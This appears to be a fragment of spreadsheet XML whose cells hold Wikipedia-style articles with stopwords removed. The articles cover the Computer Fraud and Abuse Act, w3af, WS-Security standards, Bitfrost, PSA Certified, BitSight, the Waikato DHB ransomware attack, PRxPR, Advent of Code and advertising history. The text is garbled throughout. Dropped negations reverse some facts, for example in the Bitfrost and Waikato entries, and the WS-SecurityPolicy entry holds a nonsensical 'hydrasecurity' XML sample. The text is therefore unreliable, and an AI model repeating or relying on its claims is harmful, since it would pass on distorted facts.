references external links grinder resource library biopunk directory videos richard thieme, "hacking, biohacking future humanity" "biohackers: journey cyborg america" kevin warwick, "the last remaining hurdles cyborg technology" kevin warwick, "implants technology—the future healthcare?" kevin warwick, "cyborg interfaces"</t>
  </si>
  <si>
    <t>Protected computer</t>
  </si>
  <si>
    <t>protected computers term used title section 1030 united states code, (the computer fraud abuse act) prohibits number different kinds conduct, generally involving unauthorized access damage data stored "protected computers". statute, amended national information infrastructure protection 1996, defines "protected computers" (formerly known "federal interest computers") computer—(a) exclusively financial institution united states government, case computer exclusively use, used financial institution united states government conduct constituting offense affects financial institution government; used interstate foreign commerce communication, including computer located outside united states used manner affects interstate foreign commerce communication united states. prohibits unauthorized obtaining "information protected computer conduct involved interstate foreign communication," makes felony intentionally transmit malware protected computer $5000 damage (such integrity data) result. scope justice department explains: 1994 amendments national information infrastructure act), reach subsection subsection 1030(a)(5)) broadened replacing term "federal interest computer" term "computer used interstate commerce communications." latter term broader definition "federal interest computer" u.s.c. 1030(e)(2)(b) covered computer "which computers used committing offense, located state." this meant hacker attacked computers state subject federal jurisdiction, even actions severely affected interstate foreign commerce. example, individuals attack telephone switches disrupt interstate foreign calls. 1994 change remedied defect. however, definition federal interest computer actually covered simply interstate activity. more specifically, u.s.c. 1030(e)(2)(a) covered, generically, computers belonging united states government financial institutions, used entities non-exclusive basis conduct constituting offense affected government's operation financial institution's operation computer. changing 1030(a)(5) "federal interest computer" "computer used interstate commerce communications," congress inadvertently eliminated federal protection government financial institution computers used interstate communications. example, integrity availability classified information contained intrastate local area network protected 1994 version u.s.c. 1030(a)(5), although confidentiality continued protected u.s.c. 1030(a)(1). remedy situation 1996 act, u.s.c. 1030(a)(5) redrafted cover "protected computer," term defined 1030(e)(2) used throughout statute--in 1030(a)(5), well 1030(a)(2), (a)(4), (a)(7). definition "protected computer" includes government computers, financial institution computers, computer "which used interstate foreign commerce communications." this broad definition addresses original concerns regarding intrastate "phone phreakers" (i.e., hackers penetrate telecommunications computers). also specifically includes computers used "foreign" communications. with continually expanding global information infrastructure, numerous instances international hacking, growing possibility increased global industrial espionage, important united states jurisdiction international computer crime cases. arguably, definition "federal interest computer" contained u.s.c. 1030(e)(2) conferred jurisdiction requirement computers used committing offense located state might satisfied computer located overseas. general rule, however, congress's laws presumed domestic scope only, absent specific grant extraterritorial jurisdiction. e.e.o.c. arabian american co., u.s. (1991). ensure clarity, statute amended reference international communications explicitly. also computer crime computer trespass defense intelligence agency (dia) immigration customs enforcement interpol national information infrastructure protection united states swartz united states secret service references external links cornell posting code 1030 department justice computer crime policy programs</t>
  </si>
  <si>
    <t>W3af</t>
  </si>
  <si>
    <t>w3af (web application attack audit framework) open-source application security scanner. project provides vulnerability scanner exploitation tool applications. provides information security vulnerabilities penetration testing engagements. scanner offers graphical user interface command-line interface. architecture w3af divided main parts, core plug-ins. core coordinates process provides features consumed plug-ins, find vulnerabilities exploit them. plug-ins connected share information using knowledge base. plug-ins categorized discovery, audit, grep, attack, output, mangle, evasion bruteforce. history w3af started andres riancho march 2007, many years development community. july 2010, w3af announced sponsorship partnership rapid7. with rapid7's sponsorship project able increase development speed keep growing terms users contributors. also metasploit project orbit cannon (loic) application security owasp open application security project references external links official website w3af documentation</t>
  </si>
  <si>
    <t>WS-Security</t>
  </si>
  <si>
    <t>services security (ws-security, wss) extension soap apply security services. member service specifications published oasis. protocol specifies integrity confidentiality enforced messages allows communication various security token formats, security assertion markup language (saml), kerberos, x.509. main focus signature encryption provide end-to-end security. features ws-security describes three main mechanisms: sign soap messages assure integrity. signed messages also provide non-repudiation. encrypt soap messages assure confidentiality. attach security tokens ascertain sender's identity.the specification allows variety signature formats, encryption algorithms multiple trust domains, open various security token models, x.509 certificates, kerberos tickets, user id/password credentials, saml assertions, custom-defined tokens.the token formats semantics defined associated profile documents. ws-security incorporates security features header soap message, working application layer. these mechanisms provide complete security solution services. instead, specification building block used conjunction service extensions higher-level application-specific protocols accommodate wide variety security models security technologies. general, provide guarantee security. when implementing using framework syntax, implementor ensure result vulnerable. management, trust bootstrapping, federation agreement technical details (ciphers, formats, algorithms) outside scope ws-security. cases end-to-end security soap intermediary required, intermediary less trusted, messages need signed optionally encrypted. this might case application-level proxy network perimeter terminate (transmission control protocol) connections. non-repudiation method non-repudiation write transactions audit trail subject specific security safeguards. digital signatures, ws-security supports, provide direct verifiable non-repudiation proof. alternative transport bindings although almost soap services implement http bindings, theory bindings smtp could used; case end-to-end security would required. reverse proxy/common security token even service relies upon transport layer security, might required service know user, service relayed (http-) reverse proxy. header could used convey user's token, vouched reverse proxy. issues frequent message exchanges service provider consumer, overhead significant. end-to-end security required, protocol like ws-secureconversation reduce overhead. sufficient, encryption signing, combination significantly slower mere single operations. performance below. merging several schemata like soap, saml, enc, might cause dependencies different versions library functions like canonicalization parsing, difficult manage application server. mode encryption/decryption applied mode decryption applied without verifying secure checksum (signature mac) decryption implementation likely vulnerable padding oracle attacks. performance ws-security adds significant overhead soap processing increased size message wire, cryptographic processing, requiring faster cpus memory bandwidth. evaluation 2005 measured types soap messages different size complexity processed wss4j ws-security ws-secureconversation pentium 4/2.8 cpu. some findings were: encryption faster signing. encryption signing together times slower signing alone produced significantly bigger documents. depending type message, ws-secureconversation either made difference reduced processing time half best case. took less milliseconds sign encrypt array kilobytes, took 100~200 perform security operations soap.another benchmark 2006 resulted comparison: history services initially relied underlying transport security. fact, implementations still soap allows multiple transport bindings, http smtp, soap-level security mechanism needed. lack end-to-end security dependence transport security another factor. protocol originally developed ibm, microsoft, verisign. their original specification published april 2002 followed addendum august 2002. 2002, proposals submitted oasis technical committee: service security (ws-security) services security addendum. result, ws-security published: ws-security released april 2004. version released february 2006.the version standard published oasis contained number significant differences standard proposed ibm, microsoft verisign consortium. many systems developed using proposed standard differences made incompatible systems developed oasis standard. some refer pre-oasis specification "ws-security draft 13", services security core specification. however names widely known indeed today hard clearly identify whether application server using pre- post-oasis specification. most forum posts keyword "wsse" refer pre-oasis version mandated "wsse" namespace prefix (and similar urls different versions). protocol officially called developed committee oasis-open. associated specifications following draft specifications associated ws-security: ws-federation, ws-privacy, ws-test. following approved specifications associated ws-security: ws-policy, ws-secureconversation, ws-trust, id-wsf. following architectures make ws-security: tas3. alternative point-to-point situations confidentiality data integrity also enforced services transport layer security (tls), example, sending messages https. ws-security, however, addresses wider problem maintaining integrity confidentiality messages message sent originating node, providing so-called security. applying significantly reduce overhead involved removing need encode keys message signatures sending. challenge using would messages needed application-level proxy server, would need able request routing. example, server would request coming proxy, client; could worked around proxy copy client's certificate, signing certificate trusted server, could generate key/certificate pair matching client. however, proxy operating message, ensure end-to-end security, ensures point-to-point security. also ws-security based products services saml ws-i basic security profile x.509 xacml standard fine-grained dynamic authorization. firewall references external links services security 1.1.1 (contains links download specification documents.) ws-i basic security profile services security documentation wss4j (ws-security java implementation apache) apache rampart (ws-security java implementation apache axis2) wsit services interoperability technologies (wsit) enable interoperability java platform windows communication foundation (wcf) python ws-security example</t>
  </si>
  <si>
    <t>WS-SecurityPolicy</t>
  </si>
  <si>
    <t>ws-securitypolicy services specification, created co-authors, become oasis standard version 1.2. extends fundamental security protocols specified ws-security, ws-trust ws-secureconversation offering mechanisms represent capabilities requirements services policies. security policy assertions based ws-policy framework. policy assertions used require generic security attributes like transport layer security &lt;transportbinding&gt;, message level security &lt;asymmetricbinding&gt; timestamps, specific attributes like token types. most policy assertion found following categories: protection assertions identify elements message required signed, encrypted existent. token assertions specify allowed token formats (saml, x509, username etc.). security binding assertions control basic security safeguards like transport message level security, cryptographic algorithm suite required timestamps. supporting token assertions functions like user sign-on using username token.policies used drive development tools generate code certain capabilities, used runtime negotiate security aspects service communication. policies attached wsdl elements service, port, operation message, defined policy attachment. sample policies namespaces used following xml-snippets: &lt;p:policy xmlns:p="http://www.w3.org/ns/ws-policy" xmlns:sp="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200802"&gt; &lt;/p:policy&gt; include timestamp: &lt;sp:includetimestamp either transport layer security (https) message level security (xml dsig/xml enc): &lt;exactlyone&gt; &lt;sp:transportbinding&gt;...&lt;/sp:transportbinding&gt; &lt;sp:asymmetricbinding&gt;...&lt;/sp:asymmetricbinding &lt;/exactlyone&gt; define saml assertion security token: &lt;sp:issuedtoken&gt; &lt;sp:requestsecuritytokentemplate&gt; &lt;wst:tokentype&gt;...#samlv2.0&lt;/wst:tokentype&gt; &lt;/sp:requestsecuritytokentemplate&gt; &lt;/sp:issuedtoken&gt; issued token assertion providers reference required token format: &lt;sp:issuedtoken&gt; &lt;sp:issuer&gt; &lt;wsa:endpointreference&gt; &lt;wsa:address&gt;http://sampleorg.com/sts&lt;/wsa:address&gt; &lt;/wsa:endpointreference&gt; &lt;/sp:issuer&gt; &lt;sp:requestsecuritytokentemplate&gt; &lt;wst:tokentype&gt; http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#samlassertionid &lt;/wst:tokentype&gt; &lt;/sp:requestsecuritytokentemplate&gt; &lt;/sp:issuedtoken&gt; specify message header body need signed, attachments left unsigned: &lt;sp:signedparts xmlns:sp="..." &lt;sp:body &lt;sp:header name="dx:ncname"? namespace="xd:anyuri" &lt;/sp:signedparts&gt; specify message open source license need signed, hydra security left unsigned: &lt;sp:signedparts http:np="..."...&gt; &lt;sp:hydrasecurity &lt;sp:opensourcelicense name="hs:ncname"? namespace="sh:anyuri" .../&gt;* &lt;/sp:signedparts&gt; other policy languages term services security policy language used different xml-based languages: described above, based ws-policy framework, defined published version feb. 2009 wspl, based xacml profile web-services, finalized. also list service specifications references external links ws-securitypolicy standards oasis security services world: proposed architecture roadmap (ibm/microsoft whitepaper, 2002)</t>
  </si>
  <si>
    <t>Bitfrost</t>
  </si>
  <si>
    <t>bitfrost security design specification olpc cost laptop intended children developing countries developed laptop child (olpc) project. bitfrost's main architect ivan krstić. first public specification made available february 2007. bitfrost architecture passwords passwords required access computer. system rights every program, first installed, requests certain bundles rights, instance "accessing camera", "accessing internet". system keeps track rights, program later executed environment makes requested resources available. implementation specified bitfrost, dynamic creation security contexts required. first implementation based vserver, second current implementation based user group (/etc/password edited activity started), future implementation might involve linux technology. default, system denies certain combinations rights; instance, program would granted right access camera access internet. anybody write distribute programs request allowable right combinations. programs require normally unapproved right combinations need cryptographic signature authority. laptop's user built-in security panel grant additional rights application. modifying system users modify laptop's operating system, special version fedora linux running sugar graphical user interface operating open firmware. original system remains available background restored. acquiring developer central location, user even modify background copy system many aspects bios. such developer given waiting period theft machine reported time) valid particular machine. theft-prevention leases laptops request "lease" central network server day. these leases come expiry time (typically month), laptop stops functioning leases expired. leases also given local school servers portable device. laptops registered stolen cannot acquire lease. deploying country decides whether lease system used sets lease expiry time. microphone camera laptop's built-in camera microphone hard-wired leds, user always knows operating. this cannot switched software. privacy concerns sassaman, computer security researcher catholic university leuven belgium colleague meredith patterson university iowa iowa city claim bitfrost system inadvertently become possible tool unscrupulous governments government agencies definitively trace source digital information communications originated laptops. this potentially serious issue many countries laptops governments questionable human rights records. notes specification mentions name "bitfrost" play norse mythology concept bifröst, bridge world mortals realm gods. according prose edda, bridge built strong, eventually broken; bridge early recognition idea there's thing perfect security system. also capdesk references external links ivan krstić's homepage olpc wiki: bitfrost bitfrost specification, version draft-19 release february 2007 high security $100 laptop, wired news, february 2007 making antivirus software obsolete technology review magazine recognized ivan krstić, bitfrost's main architect, world's innovators (krstić time publication) work system.</t>
  </si>
  <si>
    <t>PSA Certified</t>
  </si>
  <si>
    <t>platform security architecture (psa) certified security certification scheme internet things (iot) hardware, software devices. created holdings, brightsight, caict, prove run, riscure, trustcb part global partnership. holdings first brought forward specifications 2017 outline common standards security certified assurance scheme launching years later 2019. history 2017, holdings created platform security architecture (psa), standard security. standard builds trust internet things services devices. built include array specifications threat models, security analyses, hardware firmware architecture specifications, open-source firmware reference implementation. aimed become industry-wide security component, built-in security functions software device manufacturers.psa since evolved become certified, four-stage framework used designers security practices. framework included different levels trust, level contains different level assessment, progressively increasing security assurances.in 2018, first threat models documents published.the certification certified launched embedded world 2019, level certification presented chip vendors. draft level protection presented time.six seven founding stakeholders created certified specifications, make joint stakeholders agreement. stakeholders holdings, brightsight, caict, prove run, riscure trustcb became seventh certified member, acting independent certification body scheme. founding members, four security test laboratories, includes brightsight, caict, riscure ul.the first certified level certificates issued chip vendors february 2020.the first certified level certificate issue march 2021. certification joint stakeholders agreement outlines members create worldwide standard security enables electronic industry easy understand security scheme. security certification scheme documents enable security-by-design approach diverse products. scheme starts security assessment chip root trust (rot) builds outwards system software device application code. certified specifications implementation architecture agnostic applied chip, software device.psa certified aims removes industry fragmentation product manufacturers developers number ways. world's leading chip vendors delivering system-on-chips built root trust (psa-rot) providing widely available security component built-in security functions software platforms original device manufacturers (oems) make functional certification high-level apis provided psa-rot abstract trusted hardware firmware used different chip vendors. these apis include: cryptography attestation storage apiopen source test suites available check compliance functional certification. open-source implementation root trust apis provided trustedfirmware.org project. level first level security certification certified level aimed chip vendors, software platforms device manufacturers. certification consists questions, document review interview certification labs. completed answers accompanied explanatory notes, checked certification lab. according certified website, language mappings align important requirements, standards laws. these include nistir 8259, etsi sb-327. level mid-level security certification involves testing security lab, focusing source code review root trust (psa-rot), course month attain level certification. this process focuses carefully defined attack methods utilizes evaluation methodology. also ensures hardware must support psa-rot functions therefore aimed chip vendors.according forbes, believed level likely become common level consumer applications. level final level extends criteria level include protection various physical attacks side-channel attacks. industry adoption since launch standard, adopted number chip manufacturers system software providers. references</t>
  </si>
  <si>
    <t>WS-Trust</t>
  </si>
  <si>
    <t>ws-trust ws-* specification oasis standard provides extensions ws-security, specifically dealing issuing, renewing, validating security tokens, well ways establish, assess presence broker trust relationships participants secure message exchange. ws-trust specification authored representatives number companies, approved oasis standard march 2007. using extensions defined ws-trust, applications engage secure communication designed work within services framework. overview ws-trust defines number elements, concepts artifacts support goal, including: concept security token service (sts) service issues security tokens defined ws-security specification. formats messages used request security tokens responses messages. mechanisms exchangews-trust implemented within services libraries, provided vendors open source collaborative efforts. services frameworks implement ws-trust protocols token request include: microsoft's windows communication foundation (wcf) windows identity foundation (wif .net 4.5, integrated .net core), sun's wsit framework, apache's rampart (part axis2), others. addition, vendors groups deliver products security token service, sts. microsoft's access control services service, available online today. pingidentity corporation also markets sts. microsoft's adfs also provides implementation sts. authors companies involved defining ws-trust were: actional corporation, systems, inc. computer associates international, inc. international business machines corporation layer technologies microsoft corporation oblix inc. opennetwork technologies inc. ping identity corporation reactivity inc. security inc. verisign external links ws-trust specification document, v1.4 ws-trust specification document, v1.3 oasis' services secure exchange (ws-sx) technical committee ibm's page services trust language also ws-security ws-* service specifications services oasis (organization) security tokens security token service (sts) identity management</t>
  </si>
  <si>
    <t>WWDSI</t>
  </si>
  <si>
    <t>BitSight</t>
  </si>
  <si>
    <t>bitsight cybersecurity ratings company analyzes companies, government agencies, educational institutions. based back bay, boston. security ratings delivered bitsight used banks insurance companies among organizations. company rates 200,000 organizations respect cybersecurity. history bitsight founded 2011 nagarjuna venna stephen boyer currently united states-based international employees. 2016, bitsight raised million funding month september.in 2014, bitsight acquired anubisnetworks, portugal-based cybersecurity firm tracks real-time data threats.by september 2016, bitsight raised million series round capital, participation flybridge capital partners, globespan capital partners, menlo ventures, shaun mcconnon, divisions comcast ventures, liberty global ventures, singtel innov8.shaun mcconnon stepped bitsight july 2017 remains executive chairman board. position filled turner 2017, stephen harvey 2020.in june 2018, bitsight closed million series funding, bringing company's total funding $155 million. bitsight's series financing warburg pincus, participation existing investors menlo ventures, capital singtel innov8.in 2018, company located cambridge purchased property order shift back bay, bitsight currently located. forbes estimated bitsight's revenue us$100 million 2018. services organizations purchase bitsight's services order understand "security risks associated sharing sensitive data business partners." 2018, bitsight serves clients, including lowe's, aig, safeway.bitsight assembles models produce company ratings, based scale enables insurers rule ability businesses receive coverage. produces ratings 200,000 organizations 2020.with respect services, feldman forbes writes "customers subscription basis annual fees ranging thousand dollars analyze single company million review thousands suppliers." similar credit score, bitsight's ratings range 900.bitsight released report "examining ransomware infection across industry sectors compiled 18,996 companies." these security ratings included examination ransomware infection across sectors "education, energy/utilities, finance, government, healthcare retail". references external links bitsight</t>
  </si>
  <si>
    <t>Waikato District Health Board ransomware attack</t>
  </si>
  <si>
    <t>mid-may 2021 hospital computer systems phone lines waikato district health board (dhb) zealand affected ransomware attack. may, unidentified group claimed responsibility hack issued ultimatum waikato dhb, obtained sensitive data patients, staff finances. waikato zealand government ruled paying ransom. background according stuff journalist dileepa fonseka, ministry health entered negotiations information technology industrial vendors 2019 purchase advanced cybersecurity system country's district health boards. however, negotiations abandoned since ministry lacked budget purchase proposed system. incident cyber attack waikato district health board began 2021 brought systems phone lines. kevin snee, chief waikato dhb, said know responsible attack related health service executive cyberattack.on 2021, zealand herald reported unidentified group claimed responsibility hack. this group reportedly accessed confidential patient notes, staff details, financial information. group also claimed given waikato seven days contact following cyber attack. group reportedly deleted backup files offered help restore systems waikato responded communications. response, waikato chief executive snee refused confirm deny whether contact hackers. snee also stated would paying ransom.on may, senior waikato officials confirmed hackers seized patient staff details files sent several media including zealand herald contained genuine information. these files handed police. chief executive snee confirmed body working privacy experts providing affected patients support. snee stated waikato dhb's covid-19 vaccination programme affected cyberattack percent ahead rollout target. emsisoft cybersecurity expert fabian wosar speculated hacker's ransom demand waikato dhb's hacked data likely millions even tens millions dollars; potentially making biggest zepellin data breached confirmed. impact some surgeries postponed result attack, went ahead planned.two zealand flights cancelled airline unable negative covid-19 certificate crew member work flights.on may, unidentified doctor claimed seriously cancer patients could flown australia treatment disruption potential data breach caused waikato cyber attack. waikato also arranged urgent patients assigned private providers tauranga wellington. addition, auckland district health board agreed provide treatment waikato dhb's emergency cancer patients.by june, waikato district health board confirmed made progress restoring half servers past four days. system consisted several hundred servers, many major network sites thousands work stations.by june, radiation therapy resumed waikato hospitals patients receiving treatment previous day. addition, restoration work done salvage data waikato dhb's inpatient management system diagnostic services radiology departments.by june, kevin snee confirmed waikato managed restore clinical services, doctors' access patients' full medical information, laboratory diagnostic radiology services. however, staff still relying manual processes several areas, meant activities require additional time. also faced backlog patients outpatient appointments services cancelled cyber attack. disruption, patients seek treatment district health boards.on june, radio zealand stuff reported list documents containing sensitive information including correspondence, medical records, financial data released dark web. response, waikato confirmed contacted affected patients working cybersecurity experts identify manage potential disclosures. reactions kevin snee described attack "biggest zealand history".health minister andrew little said waikato getting possible assistance including national cyber security centre within government communications security bureau.on may, health minister little confirmed zealand government would ransom hackers order discourage offending. little confirmed hacking group contacted several media companies including stuff nzme.on may, privacy commissioner warned district health boards zealand vulnerabilities result waikato cyberattack.on june, health minister little promised full independent inquiry waikato cyber attack. following day, privacy commissioner confirmed waikato would fined patient data hacked health body faced liability harm caused references also colonial pipeline cyberattack wannacry ransomware attack affected national health service united kingdom</t>
  </si>
  <si>
    <t>PRxPR</t>
  </si>
  <si>
    <t>prxpr non-governmental, private disaster relief fund created provide short-term recovery efforts well rebuilding assistance puerto rico wake devastation caused hurricanes irma maria. they continued work providing sustainable infrastructure changes island, well grants assistance individuals hardest areas. formation prxpr created immediately category five hurricane maria passed directly puerto rico, causing widespread devastation across island. puerto rico left electricity available water island-wide. prxpr created goal unifying puerto ricans island immediate efforts helping greatest need, well long-term goal assisting rebuilding better puerto rico. founders prxpr are: carmen báez (former president, latin america omnicom group) maría celeste arrarás (emmy award journalist/author telemundo nbcu) francisco cerezo, esq. (partner head latin america piper, llp) marilú medina, esq. (senior counsel fortune company, former partner o’neill borges, llc) jorge silva puras, esq. (former chief staff governor puerto rico)by october 2017 prxpr already raised $530,000. money immediately used provide small grants individuals organizations island procure urgent needs items could found. initially, obtaining necessary items difficult. "you private cargo plane landing aguadilla airport, plane lands, there's enough personnel help unload plane," said prxpr co-founder carmen baez,”there’s enough personnel guard merchandise, load trucks, drive trucks they're needed.” organization continued last several years focus infrastructure island, helping install solar energy, water purification systems, distribute water, food medical aid, repair structures, provide grants individuals, especially farmers help individually recover overall recovery. “people lost livestock chicken laid eggs, pork provided meat, orchards gardens provided vegetables.” federal slow come, organizations like prxpr continue provide help hope people puerto rico. “the disadvantaged victims hurricane maria ones suffering burden politics,” carmen baez quoted say. federal limited slow before, worse.” year storm francisco cerezo, attorney founders prxpr, said "there still need, ‘semi-silver lining,’ people united help.the diaspora always many different kinds divisions,” continued. “there kinds ways puerto ricans self-identified. maría, walls self-identification came down. rallied continue so.” 100% donations collected prxpr directed helping, none principles volunteers paid, fact cover overhead operating expenses. donations come individuals, well support several partner businesses organizations. puerto rican journalist maria celeste commented continue prxpr (puerto rico puerto rico), organization diaspora groups, working many projects, construction orphanage girls arecibo, waiting important donation. continue insist works make difference important thing give references external links official website</t>
  </si>
  <si>
    <t>Advent of Code</t>
  </si>
  <si>
    <t>advent code annual christmas-themed computer programming challenges follow advent calendar. running since 2015.the programming puzzles cover variety skill sets skill levels solved using programming language. participants also compete based speed global private leaderboards. history advent code launched december 2015. midnight (utc−05:00), people signed event, going slightly eric wastl's planned 70-participant capacity. within hours, 4,000 people joined, nearly causing system crash. after hours, 15,000 people, 2015 event, total risen 52,000.in 2020, perhaps covid-19 pandemic, event growth traffic, 180,000 participants worldwide. puzzle design each year, puzzles created tested advance eric wastl, founder advent code. they released daily schedule december december midnight est.puzzles consist parts must solved order, second part revealed user first part solved correctly. participants earn golden star part finish, giving possible total stars fifty stars year.each puzzle contains fictional backstory participants, person receives different piece input data generate different correct result.there time limit complete puzzles, puzzles past years' events remain available solve. references external links official website</t>
  </si>
  <si>
    <t>Advertising</t>
  </si>
  <si>
    <t>advertising marketing communication employs openly sponsored, non-personal message promote sell product, service idea.: sponsors advertising typically businesses wishing promote products services. advertising differentiated public relations advertiser pays control message. differs personal selling message non-personal, i.e., directed particular individual.: 661, advertising communicated various mass media, including traditional media newspapers, magazines, television, radio, outdoor advertising direct mail; media search results, blogs, social media, websites text messages. actual presentation message medium referred advertisement (advert short). commercial advertisements often seek generate increased consumption products services "branding", associates product name image certain qualities minds consumers. hand, intend elicit immediate sale known direct-response advertising. non-commercial entities advertise consumer products services include political parties, interest groups, religious organizations governmental agencies. non-profit organizations free modes persuasion, public service announcement. advertising also help reassure employees shareholders company viable successful. modern advertising originated techniques introduced tobacco advertising 1920s, significantly campaigns edward bernays, considered founder modern, "madison avenue" advertising.worldwide spending advertising 2015 amounted estimated us$529.43 billion. advertising's projected distribution 2017 40.4% 33.3% digital, newspapers, 6.9% magazines, 5.8% outdoor 4.3% radio. internationally, largest ("big five") advertising agency groups dentsu, interpublic, omnicom, publicis, wpp.in latin, advertere means turn towards". history egyptians used papyrus make sales messages wall posters. commercial messages political campaign displays found ruins pompeii ancient arabia. lost found advertising papyrus common ancient greece ancient rome. wall rock painting commercial advertising another manifestation ancient advertising form, present many parts asia, africa, south america. tradition wall painting traced back indian rock paintings date back 4000 bc.in ancient china, earliest advertising known oral, recorded classic poetry (11th centuries bamboo flutes played sell confectionery. advertisement usually takes form calligraphic signboards inked papers. copper printing plate dated back song dynasty used print posters form square sheet paper rabbit logo "jinan liu's fine needle shop" high-quality steel rods make fine-quality needles, ready home time" written considered world's earliest identified printed advertising medium.in europe, towns cities middle ages began grow, general population unable read, instead signs read "cobbler", "miller", "tailor", "blacksmith", images associated trade would used boot, suit, hat, clock, diamond, horseshoe, candle even flour. fruits vegetables sold city square backs carts wagons proprietors used street callers (town criers) announce whereabouts. first compilation advertisements gathered "les crieries paris", thirteenth-century poem guillaume villeneuve.in 18th century advertisements started appear weekly newspapers england. these early print advertisements used mainly promote books newspapers, became increasingly affordable advances printing press; medicines, increasingly sought after. however, false advertising so-called "quack" advertisements became problem, ushered regulation advertising content. 19th century thomas barratt london called "the father modern advertising". working pears soap company, barratt created effective advertising campaign company products, involved targeted slogans, images phrases. slogans, "good morning. have used pears' soap?" famous 20th century. 1882, barratt recruited english actress socialite lillie langtry become poster-girl pears, making first celebrity endorse commercial product. becoming company's brand manager 1865, listed first kind guinness book records, barratt introduced many crucial ideas behind successful advertising widely circulated day. constantly stressed importance strong exclusive brand image pears emphasizing product's availability saturation campaigns. also understood importance constantly reevaluating market changing tastes mores, stating 1907 "tastes change, fashions change, advertiser change them. idea effective generation would fall flat, stale, unprofitable presented public today. idea today always better older idea, different hits present taste." enhanced advertising revenues effect industrial revolution britain. thanks revolution consumers created, mid-19th century biscuits chocolate became products masses, british biscuit manufacturers among first introduce branding distinguish grocery products. world's first global brands, huntley palmers biscuits sold countries 1900, global reach reflected advertisements. june 1836, french newspaper presse first include paid advertising pages, allowing lower price, extend readership increase profitability formula soon copied titles. around 1840, volney palmer established roots modern advertising agency philadelphia. 1842 palmer bought large amounts space various newspapers discounted rate resold space higher rates advertisers. actual copy, layout, artwork still prepared company wishing advertise; effect, palmer space broker. situation changed first full-service advertising agency n.w. ayer founded 1869 philadelphia. ayer offered plan, create, execute complete advertising campaigns customers. 1900 advertising agency become focal point creative planning, advertising firmly established profession. around time, france, charles-louis havas extended services news agency, havas include advertisement brokerage, making first french group organize. first, agencies brokers advertisement space newspapers. 20th century advertising increased dramatically united states industrialization expanded supply manufactured products. 1919 percent gross domestic product (gdp) averaged percent least 2007, though declined dramatically since great recession. industry could benefit increased productivity without substantial increase consumer spending. this contributed development mass marketing designed influence population's economic behavior larger scale. 1910s 1920s, advertisers u.s. adopted doctrine human instincts could targeted harnessed "sublimated" desire purchase commodities. edward bernays, nephew sigmund freud, became associated method sometimes called founder modern advertising public relations. bernays claimed that:"[the] general principle, largely actuated motives conceal themselves, true mass individual psychology. evident successful propagandist must understand true motives content accept reasons give do."in words, selling products appealing rational minds customers (the main method used prior bernays) much less effective selling products based unconscious desires bernays felt true motivators human action. "sex sells" became controversial issue, techniques titillating enlarging audience posing challenge conventional morality.in 1920s, secretary commerce herbert hoover, american government promoted advertising. hoover delivered address associated advertising clubs world 1925 called 'advertising vital force national life." october 1929, head u.s. bureau foreign domestic commerce, julius klein, stated "advertising world prosperity." this part "unparalleled" collaboration business government 1920s, according 1933 european economic journal.the tobacco companies became major advertisers order sell packaged cigarettes. tobacco companies pioneered advertising techniques hired bernays create positive associations tobacco smoking.advertising also used vehicle cultural assimilation, encouraging workers exchange traditional habits community structure favor shared "modern" lifestyle. important tool influencing immigrant workers american association foreign language newspapers (aafln). aafln primarily advertising agency also gained heavily centralized control much immigrant press. turn 20th century, advertising career choices women. since women responsible household purchasing done, advertisers agencies recognized value women's insight creative process. fact, first american advertising sexual sell created woman soap product. although tame today's standards, advertisement featured couple message skin love touch".in 1920s psychologists walter scott john watson contributed applied psychological theory field advertising. scott said, "man called reasoning animal could greater truthfulness called creature suggestion. reasonable, greater extent suggestible". demonstrated advertising technique direct command consumer. radio 1920s early 1920s, first radio stations established radio equipment manufacturers, followed non-profit organizations schools, clubs civic groups also stations. retailer consumer goods manufacturers quickly recognized radio's potential reach consumers home soon adopted advertising techniques would allow messages stand out; slogans, mascots, jingles began appear radio 1920s early television 1930s.the rise mass media communications allowed manufacturers branded goods bypass retailers advertising directly consumers. this major paradigm shift forced manufacturers focus brand stimulated need superior insights consumer purchasing, consumption usage behaviour; needs, wants aspirations. earliest radio drama series sponsored soap manufacturers genre became known soap opera. before long, radio station owners realized could increase advertising revenue selling 'air-time' small time allocations could sold multiple businesses. 1930s, advertising spots, packets time became known, sold station's geographical sales representatives, ushering national radio advertising.by 1940s, manufacturers began recognize consumers developing personal relationships brands social/psychological/anthropological sense. advertisers began motivational research consumer research gather insights consumer purchasing. strong branded campaigns chrysler exxon/esso, using insights drawn research methods psychology cultural anthropology, enduring campaigns 20th century. commercial television 1950s early 1950s, dumont television network began modern practice selling advertisement time multiple sponsors. previously, dumont trouble finding sponsors many programs compensated selling smaller blocks advertising time several businesses. this eventually became standard commercial television industry united states. however, still common practice single sponsor shows, united states steel hour. instances sponsors exercised great control content show including one's advertising agency actually writing show. single sponsor model much less prevalent now, notable exception hallmark hall fame. cable television 1980s late 1980s early 1990s introduction cable television particularly mtv. pioneering concept music video, ushered type advertising: consumer tunes advertising message, rather by-product afterthought. cable satellite television became increasingly prevalent, specialty channels emerged, including channels entirely devoted advertising, qvc, home shopping network, shoptv canada. internet 1990s with advent server, online advertising grew, contributing "dot-com" boom 1990s. entire corporations operated solely advertising revenue, offering everything coupons free internet access. turn 21st century, websites, including search engine google, changed online advertising personalizing based browsing behavior. this similar efforts increase interactive advertising.the share advertising spending relative changed little across large changes media since 1925. 1925, main advertising media america newspapers, magazines, signs streetcars, outdoor posters. advertising spending share percent. 1998, television radio become major advertising media; 2017, balance broadcast online advertising shifted, online spending exceeding broadcast. nonetheless, advertising spending share slightly lower percent.guerrilla marketing involves unusual approaches staged encounters public places, giveaways products cars covered brand messages, interactive advertising viewer respond become part advertising message. this type advertising unpredictable, causes consumers product idea. this reflects increasing trend interactive "embedded" ads, product placement, consumers vote text messages, various campaigns utilizing social network services facebook twitter.the advertising business model also adapted recent years. media equity, advertising sold, provided start-up companies return equity. company grows sold, media companies receive cash shares. domain name registrants (usually register renew domains investment) sometimes "park" domains allow advertising companies place sites return per-click payments. these typically driven click search engines like google yahoo, sometimes placed directly targeted domain names domain lease making contact registrant domain name describes product. domain name registrants generally easy identify whois records publicly available registrar websites. classification advertising categorized variety ways, including style, target audience, geographic scope, medium, purpose.: 9–15 example, print advertising, classification style include display advertising (ads design elements sold size) classified advertising (ads without design elements sold word line). advertising local, national global. campaign directed toward consumers businesses. purpose raise awareness (brand advertising), elicit immediate sale (direct response advertising). term line (atl) used advertising involving mass media; targeted forms advertising promotion referred line (btl). terms date back 1954 procter gamble began paying advertising agencies differently promotional agencies. 2010s, advertising technology developed, term, line (ttl) began come use, referring integrated advertising campaigns. traditional media virtually medium used advertising. commercial advertising media include wall 